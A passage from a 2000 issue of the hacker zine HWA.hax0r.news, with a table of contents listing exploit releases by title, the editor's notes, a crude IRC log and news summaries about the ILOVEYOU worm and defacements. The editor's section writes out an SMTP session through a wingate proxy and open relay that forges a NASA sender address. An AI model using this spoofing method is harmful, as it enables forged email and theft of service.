Cold War 192.0 .. [HNN] June 20'00 FAA Opens Cyber Security Office 193.0 .. [HNN] June 21'00 Credit Taken for Stages Worm 194.0 .. [HNN] June 21'00 Drug Office Tracks Web Visitors 195.0 .. [HNN] June 21'00 NATO Unleashes Offensive Cyberwar Weapon 196.0 .. [HNN] June 21'00 Mexico Hires Hackers To Crack Password 197.0 .. [HNN] June 21'00 Privacy Issues Get Attention In Congress 198.0 .. [HNN] June 21'00 More Speakers for H2K 199.0 .. [HNN] June 22'00 White House Supports P3P 200.0 .. [HNN] June 22'00 FSA Calls Bank Security Weak 201.0 .. [HNN] June 22'00 Nike.com Redirected 202.0 .. [HNN] June 22'00 Cybercafes labeled 'Electronic Heroin' 203.0 .. [HNN] June 22'00 Freeware Available to Track Napster Users 204.0 .. [HNN] June 22'00 ECTF labeled Cyber-Mod Squad 205.0 .. [HNN] June 22'00 Eleven Story Tall Tetris Game 206.0 .. [HNN] June 23'00 DMCA Hearings Held By US Copyright Office 207.0 .. [HNN] June 23'00 COPA Appeal Rejected! 208.0 .. [HNN] June 23'00 Mitnick Back In Court 209.0 .. [HNN] June 23'00 Security Glitch Brings Lawsuit 210.0 .. [HNN] June 23'00 UAE Files Charges Against British Worker 211.0 .. [HNN] June 23'00 Feedback on Female Hackers 212.0 .. [HNN] June 23'00 Online Retailers Don't Provide Adequate Security 213.0 .. [HNN] June 23'00 Better to Be Scared Than Sorry? 214.0 .. [HNN] June 23'00 Snooping Enters the Mainstream 215.0 .. [HNN] June 26'00 24,000 Credit Card Numbers At Risk 216.0 .. [HNN] June 26'00 Russians Introduce Cyber Doctrine 217.0 .. [HNN] June 26'00 Mitnick In Court Today 218.0 .. [HNN] June 26'00 More Info Reported Missing At Los Alamos 219.0 .. [HNN] June 26'00 The HoneyNet Research Project 220.0 .. [HNN] June 26'00 Cell Phones And Driving Don't Mix 221.0 .. [HNN] June 26'00 New Viruses Attack The Soul 222.0 .. [HNN] June 26'00 Traditional Hackers Upset Over Use of Term 223.0 .. [HNN] June 27'00 Oracle Admits to Spying on Microsoft 224.0 .. [HNN] June 27'00 FBI To Investigate Stages Worm 225.0 .. [HNN] June 27'00 Mattel Will Remove Spyware 226.0 .. [HNN] June 27'00 Russia Accuses Lithuanian of Hacking For The US 227.0 .. [HNN] June 27'00 BSA Settles With 20 Companies 228.0 .. [HNN] June 27'00 UAE Telecom Firm Will Prosecute 229.0 .. [HNN] June 28'00 Oracle Admits to Spying on Microsoft 230.0 .. [IND] UK: White-hat Hacker Engaged In Black Arts 231.0 .. [IND] India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security. 232.0 .. [IND] Hackers Shoot, Score On NHL Web Site 233.0 .. [IND] Computer whiz alters high school's gradess 234.0 .. [HNN] Jun 29'00 Australian Tax Office Allegedly Compromised 235.0 .. [HNN] Jun 29'00 AOL Tells FCC That IM Security Is Top Priority 236.0 .. [HNN] Jun 29'00 McCain Still Pushing for Filtering 237.0 .. [HNN] Jun 29'00 Lawsuit Filed Over Nike Redirection 238.0 .. [HNN] Jun 29'00 eCrime Documentary 239.0 .. [HNN] Jun 29'00 E-mail Used As Evidence In Korea 240.0 .. [HNN] Jun 30'00 AOL Users Subjected to Social Engineering 241.0 .. [HNN] Jun 30'00 ZDNet Launches Echelon Study 242.0 .. [HNN] Jun 30'00 Interpol and Atomic Tangerine Announce Collaboration 243.0 .. [HNN] Jun 30'00 Survey Results Show That Precautions Lag Concerns 244.0 .. [HNN] Jun 30'00 Student Confesses to Numerous Private and Government Attacks 245.0 .. [HNN] Jun 30'00 Threat From Russia? 246.0 .. [HNN] Jun 30'00 Zines Update 247.0 .. [IND] May 26th: Lights Out 248.0 .. [IND] May 30th Anti-Metallica Hackers Hit DC Metro Web Site 249.0 .. [IND] June 1st Hackers Drawn By The Thrills, The Challenge or Just Plain Cash 250.0 .. [IND] Web Hijackers Pilfer Internet Domain Names 251.0 .. [IND] High-Tech Crooks Thrive in Russia 252.0 .. [TXT] Treatise: "Why EFnet Sucks." by: Anonoymous Whiner 253.0 .. [HWA] Honeypots: who's fooling who? 254.0 .. [IND] Hacking Away At Government 255.0 .. [IND] Default passwords list 256.0 .. [IND] Security Firm To List Additional Hacking Threats 257.0 .. [IND] SANS: Top 10 hacker targets 258.0 .. [0x4] Justin Tanner aka Agent Steal in amazing plot escapes again. 259.0 .. [IND] Peeping Through Port 139 260.0 .. [IND] Hacker Hits Road Runner Server; 261.0 .. [IND] Swedish Hacker-Tracker Is FBI And Media Darling 262.0 .. [IND] Hackers Force HK Government Website to Shut Down Again 263.0 .. [IND] Dozens of Malaysian Political Web Sites Hacked 264.0 .. [IND] Youth Nabbed in Singapore for Hacking in Australia 265.0 .. [IND] Facing a Man’s World:Female Hackers Battle Sexism to Get Ahead 266.0 .. [IND] Social study: staunch religious hackers? 267.0 .. [IND] Ex-KGB Major Leads US War Against Hackers 268.0 .. [IND] Flagship Hong Kong Govt Web Site Defaced, Twice 269.0 .. [IND] Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime 270.0 .. [IND] Daemons on the Net:Stereotyping the hacker ** 271.0 .. [IND] China: Defiant Cyber Surfers Play Cat-and-Mouse Game 272.0 .. [IND] Hacker's Humorous Tips to Websites 273.0 .. [IND] r00tfest 2000: Computer Hackers Ride into Town Today 274.0 .. [IND] UK Watchdog Warns Net Banks Over Hackers 275.0 .. [IND] Hacker Attacks Gun Control Group's Web Site 276.0 .. [IND] Hackers Attack Nike, United Arab Emirates Sites 277.0 .. [IND] Rock Band's Answer To Napster: Sabotage 278.0 .. [IND] Pro-gun Hackers Take Over Web Site 279.0 .. [IND] Hacker Taps Into 24,000 Credit Cards 280.0 .. [IND] Etisalat Vows to Prosecute Internet Hackers 281.0 .. [IND] Foundstone's Ultimate Hacking Course Available at Black Hat Briefings 282.0 .. [IND] Student Admits Hacking U.S. Government Computers 283.0 .. [IND] Hacker may have endangered astronauts 284.0 .. [IND] July 2000: Accused UAE Hacker Files Defamation Lawsuit 285.0 .. [IND] July 2000: NASA Denies Hacker Attack Danger 286.0 .. [IND] July 2000: 'Houston, We Don't Have A Problem.' 287.0 .. [IND] July 2000: Crackers are Common Criminals 288.0 .. [IND] May 2000: Black Hat Briefings -Singapore, May 2000 289.0 .. [IND] FBI Investigating Qualcomm Hacker 290.0 .. [IND] Lloyd's Offers Hacker Insurance 291.0 .. [MM] Man charged with breaking into NASA computers 292.0 .. [MM] The FBI's Carnivore(s) Initiative (More big brother) 293.0 .. [IND] Forbidden Knowledge calls it quits. 294.0 .. [b0f] Lamagra's "roothat" hacker wargames, hack legally! 295.0 .. [HWA] Out of the quagmire, something intersting emerges: b10z crew 296.0 .. [MM] Cnet:AltaVista credits players $1 after contest error 297.0 .. [HWA] Securax "socksploitation" tutorial 298.0 .. [IND] Hacktivism: Hacktivismo with cDc 299.0 .. [IND] Hacktivism: GForce using website defacements to spread their word 300.0 .. [HNS] Help Net Security News Letter #20 301.0 .. [MM] NAPSTER GETS ORDERED TO BE SHUT DOWN IS THE FIGHT LOST? 302.0 .. [IND] Paper: Know your enemy #1 by Lance Spitzner 303.0 .. [IND] Paper: Know your enemy #2 by Lance Spitzner 304.0 .. [IND] Paper: Know your enemy #3: Forensic Analysis by Lance Spitzner 305.0 .. [IND] Paper: Know your enemy #4 by Lance Spitzner : The motives 306.0 .. [IND] Support docs and logs from the Know your enemy papers 307.0 .. [IND] Trinoo DDoS Analysis 308.0 .. [IND] Remote root exploit HOW-TO by E-mind 309.0 .. [IND] Paper: Armoring Linux by Lance Spitzner (July 28th 2000) 310.0 .. [IND] Paper: Tracking Hackers On Irc by Theory Group 311.0 .. [IND] More spies in the wires..software that snoops on you and more. 312.0 .. [IND] Why Linux sucks. 313.0 .. [IND] Article submission on 'Social Engineering' by tekneke 314.0 .. [IBT] Ethics & The Underground, What the hell happened? - Gh0zt 315.0 .. [IND] PCFS.C by Mixter 316.0 .. [IND] The hypocracy runs rampant prizm mr anti-defacement himself defaces? 317.0 .. [MM] Do you have an imaginary friend? no? are you sure?? 318.0 .. [HWA] What ever happened to .... 7thSphere? 319.0 .. [IND] Study Shows: FBI Alienates Industry Security Experts 320.0 .. [HWA] Silly IRC logs for your amusement and edufication 321.0 .. [HWA] The strange case of Cruci's birthday dog 322.0 .. [HWA] Interview: Herbless mass defacer in limelight recently by PhantasmP 323.0 .. [HWA] Interview with Pimpshiz in limelight recently by SugarKing 324.0 .. [HWA] BS interview with DeC who hosed us but it was mildly amusing..by Cruciphux 325.0 .. [HWA] Interview: Mixter by Cruciphux (NOT SugarKing) 326.0 .. [HWA] Interview: back to business, political hackers GForce by SugarKing 327.0 .. [HWA] Interview: Ph33r the B33r by SugarKing 327.1 .. [HWA] Interview: BeC some oldskewl muscle makes some noise.(additional feature) 328.0 .. [HWA] Release: eth0 releases sscan2k-pre6 scanner 329.0 .. [HWA] Release: WhiteRuss w00p local BFTPD exploit PoC 330.0 .. [HWA] Release: xitami.c DoS by forrest 331.0 .. [HWA] Release: unicode M$ hack similar to those seen used recently by: Grazer 332.0 .. [HWA] Release: Hlds Half life server vuln by csh ** 333.0 .. [HWA] Release: trans0ft brokerftp vuln by eth0 334.0 .. [HWA] Release: Grazer releases R2D2 dos 335.0 .. [HWA] The Bind P3 exploit revealed. 336.0 .. [HWA] Darknet.hwa-security.net Mirror opens 337.0 .. [IND] from the didn't they die? files: genocide2600.com oldskewl revisited 338.0 .. [HWA] Nov 2000: The day efnet nearly died, The ShadowKnight and Mafiaboy crusade 339.0 .. [IND] Nov 2000: Arab Hackers Hit U.S. Firm for Israeli Ties 340.0 .. [HWA] Nov 2000: HOTNEW at time of print, mass hack/dos of gaming sites 341.0 .. [IND] Nov 2000: Paranoia Vs. Transparency And Their Effects On Internet Security 342.0 .. [IND] Nov 2000: Trouble in the Holy land, Cyberwar and the Israeli Underground's Press Release. 343.0 .. [IND] Nov 2000: NOCPulse and ISS warn of impending DDoS attacks this Christmas 344.0 .. [IND] Oct 2000: Carnivore does more than previously thought 345.0 .. [IND] Nov 2000: Surprise! RSA releases crypto patent ahead of schedule 346.0 .. [IND] Nov 2000: Hackers: The millennial scapegoats? 347.0 .. [IND] Nov 2000: Student Arrested in Emulex Hoax Case 348.0 .. [EXP] Nov 2000: 0Day (yeah sure) exploit for WuFTPD < 2.6.1 fx9.c .. [HWA] Hidden tracks #57 is in progress with current news/exploits and releases, no due date projected at this time. - Cruci =-------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in.ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Ha.Ha .. Humour and puzzles ............................................ Oi! laddie! send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... * COMMON TROJAN PORTS LISTING..................................... A.1 .. PHACVW linx and references...................................... A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site) A.3 ,, Mirror Sites list............................................... A.4 .. The Hacker's Ethic 90's Style.................................. A.5 .. Sources........................................................ A.6 .. Resources...................................................... A.7 .. Submission information......................................... A.8 .. Mailing lists information...................................... A.9 .. Whats in a name? why HWA.hax0r.news??.......................... A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again). A.11 .. Underground and (security?) Zines.............................. * Feb 2000 moved opening data to appendices, A.2 through A.10, probably more to be added. Quicker to get to the news, and info etc... - Ed =--------------------------------------------------------------------------= @HWA'99, 2000 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _ _ | | ___ __ _ __ _| | | | / _ \/ _` |/ _` | | | |__| __/ (_| | (_| | | |_____\___|\__, |\__,_|_| |___/ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD ** USE NO HOOKS ** Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez Archive?), and does not condone 'warez' in any shape manner or form, unless they're good, fresh 0-day and on a fast site. HWA.hax0r.news is now officially sponsored by the following entities: HWA Internet Security http://hwa-security.net/ CubeSoft Communications http://www.csoft.net/ We strongly suggest Csoft for your hosting needs, tell them cruciphux from HWA sent you. contact julien@csoft,net for details and check the site for plans available. Rights of sources included in our newsletter/zine ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Some sources and agencies impose unfair limitations and restrictions on the use of their data, I do not generally ask permission to include the articles from major media or other persons that have published material on the net, imho this material is public domain. Example: "This material is subject to copyright and any unauthorised use, copying or mirroring is prohibited. " This notice will be disregarded we don't charge for access to these archives, if anything we're doing the site(s) a favour by disseminating their news. Legal action will result in a civil disobedience action and will incur underground continuance of our zine. cruciphux@dok.org Cruciphux [C*:.] HWA/DoK Since 1989 00.1 CONTACT INFORMATION AND MAIL DROP =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: Address changed from: X HWA NEWS X P.O BOX 44118 X 370 MAIN ST. NORTH X BRAMPTON, ONTARIO X CANADA X L6V 4H5 to: HWA P.O BOX 44118 POSTAL OUTLET UNIT #9 ONE WEXFORD ROAD BRAMPTON, ONTARIO CANADA L6Z 4V7 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you ~~~~~~~ are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: cruciphux@dok.org Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Other methods: Cruciphux's ICQ:58303688 note; not always online, and do not abuse or use for lame questions! My Preffered chat method: IRC Efnet in #hwa-security or #HWA.hax0r.news @HWA 00.2 WHO ARE WE AND WHY? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= "The number one use of NT servers on the internet today is definately that of the web defacement artist" - Gallop poll May 2000 We have definately evolved since 1998, we now have a second website with dynamic news content and a fresh kicking new layout soon to be implemented and also a killer coding team working on security vulnerabilities exploits and auditing software and building new tools. Watch us closely over time as we grow and produce some worthwhile product for the compsec/(and also indirectly) underground contingent of the hacking scene. http://hwa-security.net/about.html http://hwa-security.net/contact.html @HWA 01.0 Greets!?!?! ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. GREETS ~~~~~~ Hi m0m! All HWA members and new inductees, people that filled out jobs.php and are still on waiting list... #hwa-security , #hwa.hax0r.news etc DISSES? ~~~~~~~ You get the biggest dis of them all, your name(s) will not even be mentioned here in the zine, you are nothing. You know who you are, deal and squeal. EoF 01.1 Last minute stuff, rumours and newsbytes _ _ ____ _ | \ | | _____ _____| __ ) _ _| |_ ___ ___ | \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __| | |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \ |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/ |___/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= SECTION DELETED @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read SECTION DELETED @HWA 02.0 Words from the editor. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _____ _ _ _ _ | ____|__| (_) |_ ___ _ __( )__ | _| / _` | | __/ _ \| '__|/ __| | |__| (_| | | || (_) | | \__ \ ___|_____\__,_|_|\__\___/|_| |___/ / ___| ___ __ _ _ __ | |__ _____ __ \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ / ___) | (_) | (_| | |_) | |_) | (_) > < |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\ |_| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #include #include #include main() { printf ("Read commented source!\n\n"); /* Well, I broke the rules again, yeah ... decided it was time * to re-setup my system and overhaul my production box, well * naturally I forgot to back up a few things including several * email folders and .. the bulk of this issue (#54) so ... it * is inevitable that this issue is unfortunately incomplete at * best. * * If you submitted articles etc for this issue and they did not * appear please kindly resend them and i'll include in the next * release, apologies to all. * * * Cruci- * * cruciphux@dok.org * */ printf ("EoF.\n"); } Anonymous email: telnet (wingate ip) (see our proxies list) Wingate>0.0.0.0 Trying 0.0.0.0... Connected to target.host.edu Escape character is '^]'. 220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST) HELO bogus.com 250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you MAIL FROM: admin@nasa.gov 250 admin@nasa.gov... Sender ok RCPT TO: cruciphux@dok.org 250 cruciphux@dok.org... Recipient ok DATA Secret cool infoz . QUIT If you got that far everything is probably ok, otherwise you might see 550 cruciphux@dok.org... Relaying denied or 550 admin@nasa.gov... Domain must exist etc. * This won't work on a server with up to date rule sets denying relaying and your attempts will be logged so we don't suggest you actually use this method to reach us, its probably also illegal (theft of service) so, don't do it. ;-) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= start =--= start =--= start =--= start =--= start =--= start =--= start =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= start =--= start =--= start =--= start =--= start =--= start =--= start =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ".. since we incorporated, we can proudly say,'Now with 20% more shit!'" =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= In the land of the snivelling wotsits lay the honourable creed musers ... #fuckmedead [15:36] hrmm [15:37] dont want to go over there (pointing to office with Don, Ralph and Norman) [15:38] c'mon ask me why [15:38] damnit [15:38] why [15:38] computer talk!?!? [15:38] no, they're talking about pornos [15:38] rofl [15:38] ugh [15:39] "fuck pornos" [15:39] hey thats a quotable quote [15:39] heh [15:40] S.A.U.N.A. [15:40] you too can now own your own ANUSTICK (c) [15:40] Society Against the Use of Needless Acronyms [15:41] "hey bob, is that a stick up your ass?" [15:41] haha [15:41] "Why, yes it is!" [15:41] thats (c)(tm)(r) me [15:42] get your very own ANUSTICK for only $19.95 ... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= start =--= start =--= start =--= start =--= start =--= start =--= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 03.0 [HNN] May 09'00 ILOVEYOU Investigation Continues ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Lots of people Experts Say Police Got Wrong Suspects Two computer virus experts have come forward and said that they do not believe that the couple in Manila currently under investigation for their role with the ILOVEYOU virus/worm are in fact the author of the code. James Atkinson from the Granite Island Group feels that the true author is Anjabi, a 15 to 17 year old girl who lives near the current suspects. Wired Suspect Ordered Released The 27-year-old bank employee that has been arrested in connection with The ILOVEYOU virus/worm has been released. Reonel Ramones had been arrested and charged the violating the Access Devices Regulation Act. Police, however, have not been able to compile enough evidence to hold the man forcing them to let him go pending the collection of more evidence. He will still be forced to appear in court on May 19 to answer the preliminary charges. Reuters - via Yahoo Manila Police Now Looking for 10 Suspects Philippine police said that they are now looking for up to ten people who may have had access to computers at the AMA Computer College. The couple currently under investigation has attended the college in the past. Reuters - via Yahoo http://www.wired.com/news/politics/0,1283,36203,00.html http://dailynews.yahoo.com/h/nm/20000509/ts/virus_philippines_13.html http://dailynews.yahoo.com/h/nm/20000509/ts/virus_philippines_10.html ---------- 04.0 [HNN] May 09'00 Brace Yourselves For the SuperVirus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles While this article is sensationalistic, full of hype and FUD, it does make and important point. ILOVEYOU was not as bad as it could have been. Just think if it was targeted against other types of files, .exe for instance. Or if it had been an auto executable with no user intervention required? London Observer http://shns.scripps.com/shns/story.cfm?pk ---------- 05.0 [HNN] May 09'00 NIPC Accused of Dragging Feet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Brian The National Infrastructure Protection Center was critized for overreacting to the recent 911 virus that had minimal impact and now is being critized again for not reacting strong enough to ILOVEYOU. Sen. Robert Bennett, R-Utah wants to investigate whether NIPC's response was quick enough. Newsbytes NIPC - Latest Advisory http://www.newsbytes.com/pubNews/00/148613.html http://www.nipc.gov/nipc/alert00-041e.htm @HWA 06.0 [HNN] May 09'00 Classified Systems Hit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench ILOVEYOU somehow managed to jump the air gap and infected at least four Department of Defense classified systems. DoD said that the infection was quickly quarantined and that The Joint Task Force on Computer Network Defense will be investigating how the classified systems became infected. Government Executive Magazine http://www.govexec.com/dailyfed/0500/050800j1.htm @HWA 07.0 [HNN] May 09'00 Mitnick in Online Chat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by apocalyse Despite being banned from touching a computer or anything connected to the Internet for three years, Kevin Mitnick was able to participate in an online chat with ABC News. The topic of discussion was of course the ILOVEYOU virus/worm. ABC News http://abcnews.go.com/sections/tech/DailyNews/chat_000508mitnick.html @HWA 08.0 [HNN] May 09'00 Phreakers In the White House ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by major The FBI is conducting an investigation into whether the White House phone system has been breached. The breach may have involved the "real time" interception of telephone conversations. The FBI has been investigating Amdocs, a Chesterfield Mo., telecommunications billing company who assisted Bell Atlantic with installing telephone lines at the White House in 1997. The FBI has tried to get an arrest warrant for a suspect however a senior law enforcement official told Fox News that "to suggest that the phones at the White House have been penetrated is not supported by the facts." Fox News http://www.foxnews.com/national/050500/phonebreach.sml @HWA 09.0 [HNN] May 09'00 MS vs Netscape in Blame for Security Hole ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopolyse Microsoft and Netscape Communications are pointing fingers at each other over a browser-related security problem that neither company has any intention of fixing. (Do I have to say more?) C|Net http://news.cnet.com/news/0-1005-200-1820959.html?tag @HWA 10.0 [HNN] May 09'00 Hacker vs. Cracker The Debate Continues ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Weld Pond Blair Shewchuk, a journalist with the Canadian Broadcasting Company, has published a really good treatise on why media outlets continue to use the word 'hacker' instead of 'cracker' or some other alternative. While he may be correct in that you can not force people to use different words or change their meanings in the dictionary you can send a hell of a lot of emails. (Personally we prefer the word attacker or criminal, much less confusion with that.) Canadian Broadcasting Company http://cbc.ca/news/indepth/words/hack.html @HWA 11.0 [HNN] May 10'00 Buffer Overflow: The Name Game: Groking the Love Bug ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by McIntyre The media frenzy surrounding the ILOVEYOU or 'Love Bug' virus/worm has resulted in several contradictions within the press. Event the National Bureau of Investigation can't seem to gets its facts straight. Things like names, relationships, and damage estimates would seem to be pretty standard and easy things to report on, or are they? McIntyre takes a look at these questions and more in the latest article in the Buffer Overflow. Buffer Overflow @HWA 12.0 [HNN] May 10'00 New Virus/Worm On The Loose, Friendmess.A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Space Rogue While based on ILOVEYOU Friendmess.A is different enough to be considered a separate entity and not a variant. After being infected by Friendmess the virus/worm will delete files from the Windows directory including Windows/System and Windows/Temp. While the danger from Friendmess is high it is not spreading as fast as ILOVEYOU. ZD Net http://www.zdnet.com/zdhelp/stories/main/0,5594,2566037,00.html @HWA 13.0 [HNN] May 10'00 YTCracker Busted For Web Defacement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by ytcracker YTCracker has been arrested and charged with one count each of computer crime and criminal mischief for defacing the web site of the city of Colorado Springs last October. The two felony charges carry a maximum penalty of two years of juvenile detention. The Gazette Attrition.org - Mirrors of YTCrackers Defacements http://www.gazette.com/daily/top3.html http://www.attrition.org/mirror/attrition/ytcracker.html @HWA 14.0 [HNN] May 10'00 Gov Security Laws Introduced At Summit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles Senator Fred Thompson (R-Tennessee) has introduced legislation that would require the federal government to conduct yearly checks of the security of its computer systems and force managers of those systems to prove they are secure. The Government Information Security Act was introduced at the Internet Defense Summit and was been approved the Government Affairs Committee Tuesday. Wired http://www.wired.com/news/politics/0,1283,36223,00.html @HWA 15.0 [HNN] May 10'00 Internet Fraud Complaint Center Launched By DoJ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench and acopalyse Janet Reno has announced the creation of The Internet Fraud Complaint Center, a joint venture launched by the FBI and National White Collar Crime Center. The new center will be aimed at providing better coordination among law enforcement agencies in tackling complaints of fraud on the Internet. Government Executive Magazine E Commerce Times Internet Fraud Complaint 